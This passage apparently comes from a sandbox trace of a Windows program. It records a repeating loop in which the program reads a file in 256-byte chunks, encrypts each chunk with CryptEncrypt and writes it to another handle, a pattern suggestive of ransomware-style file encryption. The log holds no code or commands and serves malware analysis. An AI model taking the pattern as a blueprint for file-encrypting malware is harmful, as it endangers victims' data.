lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.156] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.157] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.157] GetLastError () returned 0x0 [0172.157] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.157] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.157] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.157] GetLastError () returned 0x0 [0172.157] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.157] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.157] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.157] GetLastError () returned 0x0 [0172.157] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.157] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.157] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.157] GetLastError () returned 0x0 [0172.157] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.157] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.157] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.157] GetLastError () returned 0x0 [0172.157] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.157] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.249] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.249] GetLastError () returned 0x0 [0172.249] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.249] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.249] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.249] GetLastError () returned 0x0 [0172.249] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.249] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.249] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.249] GetLastError () returned 0x0 [0172.249] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.250] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.250] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.250] GetLastError () returned 0x0 [0172.250] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.250] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.250] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.250] GetLastError () returned 0x0 [0172.250] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.250] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.251] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.251] GetLastError () returned 0x0 [0172.251] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.251] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.251] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.251] GetLastError () returned 0x0 [0172.251] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.251] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.251] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.251] GetLastError () returned 0x0 [0172.251] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.251] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.251] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.251] GetLastError () returned 0x0 [0172.251] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.251] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.251] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.251] GetLastError () returned 0x0 [0172.251] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.251] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.251] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.251] GetLastError () returned 0x0 [0172.251] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.251] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.251] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.251] GetLastError () returned 0x0 [0172.252] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.252] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.252] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.252] GetLastError () returned 0x0 [0172.252] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.252] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.252] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.252] GetLastError () returned 0x0 [0172.252] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.252] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.252] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.252] GetLastError () returned 0x0 [0172.252] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.252] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.252] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.252] GetLastError () returned 0x0 [0172.252] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.252] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.252] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.252] GetLastError () returned 0x0 [0172.252] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.252] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.252] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.252] GetLastError () returned 0x0 [0172.252] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.253] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.253] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.253] GetLastError () returned 0x0 [0172.253] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.253] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.253] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.253] GetLastError () returned 0x0 [0172.253] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.253] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.253] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.253] GetLastError () returned 0x0 [0172.253] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.253] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.253] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.253] GetLastError () returned 0x0 [0172.253] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.253] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.253] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.253] GetLastError () returned 0x0 [0172.253] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.253] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.253] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.253] GetLastError () returned 0x0 [0172.253] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.254] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.254] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.254] GetLastError () returned 0x0 [0172.254] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.254] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.254] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.254] GetLastError () returned 0x0 [0172.254] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.254] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.254] 